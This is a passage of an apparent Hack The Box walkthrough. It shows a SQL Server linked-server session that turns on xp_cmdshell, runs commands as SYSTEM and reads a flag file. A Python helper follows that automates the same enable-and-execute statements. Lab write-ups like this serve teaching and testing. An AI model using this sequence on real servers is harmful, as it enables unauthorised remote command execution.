1> EXECUTE('xp_cmdshell ''whoami''') AT [LOCAL.TEST.LINKED.SRV]
2> go
Msg 15281, Level 16, State 1
Server 'WIN-HARD\SQLEXPRESS', Procedure 'xp_cmdshell', Line 1
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

====> xp_cmdshell is disabled on the linked server. Since the login the link uses has the rights to change server settings, we can turn it on ourselves with sp_configure. Note the doubled single quotes: the inner statement is passed to EXECUTE as one string literal.

# Step 4: Enable xp_cmdshell

1> EXECUTE('EXECUTE sp_configure ''show advanced options'', 1') AT [LOCAL.TEST.LINKED.SRV]


2> go
Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
1> EXECUTE('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV]
2> go
1> EXECUTE('EXECUTE sp_configure ''xp_cmdshell'', 1') AT [LOCAL.TEST.LINKED.SRV]
2> go
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
1> EXECUTE('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV]
2> go
1> EXECUTE('xp_cmdshell ''whoami''') AT [LOCAL.TEST.LINKED.SRV]
2> go

nt authority\system

The SQL Server service on the linked server runs as nt authority\system, so xp_cmdshell there can read any file on that host, including the flag on the Administrator's desktop:
1> EXECUTE('xp_cmdshell ''type C:\Users\Administrator\Desktop\flag.txt''') AT [LOCAL.TEST.LINKED.SRV]


2> go

HTB{XXXXX _l!nkXXXX_$3rv3r$}
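The nested quoting in the session above is where this technique usually goes wrong: every single quote inside the string handed to EXECUTE(...) AT has to be doubled, and a command that itself contains quotes has to be doubled twice. The following is an added Python example, not from the original walkthrough or from HTB, that builds the statements used above (impersonation, linked-server discovery, remote execution and the xp_cmdshell enable sequence) with the escaping done in one place, and treats the Msg 15281 reply as the signal to run that sequence before retrying. The function names, the constants and the error-matching regex are my own; the login and linked server names are the ones from the session.

```python
import re

# Names from the session above.
LINKED_SERVER = "LOCAL.TEST.LINKED.SRV"
IMPERSONATED_LOGIN = "john"

# SQL Server message 15281 as the session received it when xp_cmdshell was off (assumed text shape).
XP_CMDSHELL_DISABLED = re.compile(
    r"Msg 15281\b.*?blocked access to procedure 'sys\.xp_cmdshell'", re.S
)


def quote_literal(text):
    """Embed text in a T-SQL string literal: every single quote is doubled."""
    return "'" + text.replace("'", "''") + "'"


def quote_identifier(name):
    """Bracket-quote an identifier such as a linked server name; ] is escaped as ]]."""
    return "[" + name.replace("]", "]]") + "]"


def impersonate(login):
    """EXECUTE AS LOGIN switches the session to that login; the two SELECTs confirm who we are now."""
    return (
        f"EXECUTE AS LOGIN = {quote_literal(login)}\n"
        "SELECT SYSTEM_USER\n"
        "SELECT IS_SRVROLEMEMBER('sysadmin')"
    )


def list_linked_servers():
    """isremote = 1 is a remote server entry, 0 a linked server we can EXECUTE AT."""
    return "SELECT srvname, isremote FROM sysservers"


def exec_at(linked_server, inner_sql):
    """Run inner_sql on the linked server; the whole inner statement travels as one literal."""
    return f"EXECUTE({quote_literal(inner_sql)}) AT {quote_identifier(linked_server)}"


def xp_cmdshell(command):
    """xp_cmdshell takes the OS command as a literal, so its quotes are doubled once here..."""
    return f"xp_cmdshell {quote_literal(command)}"


def xp_cmdshell_at(linked_server, command):
    """...and doubled again when exec_at wraps the statement."""
    return exec_at(linked_server, xp_cmdshell(command))


def enable_xp_cmdshell_at(linked_server):
    """The sp_configure sequence the session used once Msg 15281 came back."""
    steps = [
        "EXECUTE sp_configure 'show advanced options', 1",
        "RECONFIGURE",
        "EXECUTE sp_configure 'xp_cmdshell', 1",
        "RECONFIGURE",
    ]
    return [exec_at(linked_server, s) for s in steps]


def next_statements_after(linked_server, command, server_reply):
    """What to send after an xp_cmdshell attempt: on Msg 15281 enable the procedure and retry
    the same command; on any other reply the command already went through, so nothing more."""
    if XP_CMDSHELL_DISABLED.search(server_reply):
        return enable_xp_cmdshell_at(linked_server) + [xp_cmdshell_at(linked_server, command)]
    return []


if __name__ == "__main__":
    print(impersonate(IMPERSONATED_LOGIN))
    print(list_linked_servers())
    print(exec_at(LINKED_SERVER, "select @@servername, system_user, is_srvrolemember('sysadmin')"))
    for statement in enable_xp_cmdshell_at(LINKED_SERVER):
        print(statement)
    print(xp_cmdshell_at(LINKED_SERVER, r"type C:\Users\Administrator\Desktop\flag.txt"))
```

Generating the statements this way also keeps the attack honest about prerequisites: sp_configure only succeeds if the login behind the link may alter server settings, and running a command with quotes of its own (an echo with a quoted argument, say) is where hand-typed escaping silently breaks.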
